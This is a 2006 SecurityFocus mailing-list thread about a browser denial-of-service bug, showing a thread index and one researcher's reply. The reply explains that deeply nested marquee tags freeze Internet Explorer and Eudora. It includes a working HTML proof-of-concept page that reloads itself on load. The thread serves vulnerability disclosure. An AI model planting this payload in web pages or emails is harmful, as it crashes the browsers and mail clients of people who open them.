SecurityFocus

Fire fox dos exploit May 30 2006 12:03PM
co296 aol com (2 replies)

Re: Fire fox dos exploit May 31 2006 02:50PM
Josh Zlatin-Amishav (josh tkos co il) (5 replies)

Re: Fire fox dos exploit Jun 01 2006 08:00PM
Aaron Hopkins (lists die net)

Re: Fire fox dos exploit May 31 2006 08:14PM
Phil Trainor (ptrainor imperfectnetworks com)

Re: Fire fox dos exploit May 31 2006 05:28PM
Yannick von Arx (yannick vonarx yanux ch)

Re: Fire fox dos exploit May 31 2006 05:08PM
Ronald van den Blink (ronald securityview org)

RE: Fire fox dos exploit May 31 2006 04:22PM
Andy (andy nds uk com) (1 replies)

RE: Fire fox dos exploit Jun 05 2006 03:49AM
Sanjay Rawat (sanjayr intoto com) (1 replies)

RE: Fire fox dos exploit Jun 07 2006 10:43AM
Jaroslaw Sajko (sloik parareal net)

Dnia 05-06-2006, pon o godzinie 09:19 +0530, Sanjay Rawat napisaÅ?(a):
> I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to
> open the original mail in Eudora mail client and whenever I clicked on the
> the mail , Eudora stopped responding anymore. I had to restart the application.
>
> regards
> -Sanjay Rawat

Yes, it's because Eudora uses Internet_Explorer_Server component to
display the content of the email. And the previously mentioned DoS case
with the nested <marquee> tags concerns the Internet Explorer as well.

If you want to trigger this DoS under the IExplorer you have to include
<style></style> tags in the two separate lines and you have to refresh
the page, only second page fetch freezes the browser.

Tested on 6.0.2900.2180 XPSP2

Example is here:

--[cut]--

<html>
<head>
<style>
</style>
</head>
<body onload="javascript:window.location.reload(false)">
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

--[/cut]--

regards,
Jarek Sajko

[ reply ]

Re: Fire fox dos exploit May 31 2006 01:59PM
pagvac (unknown pentester gmail com)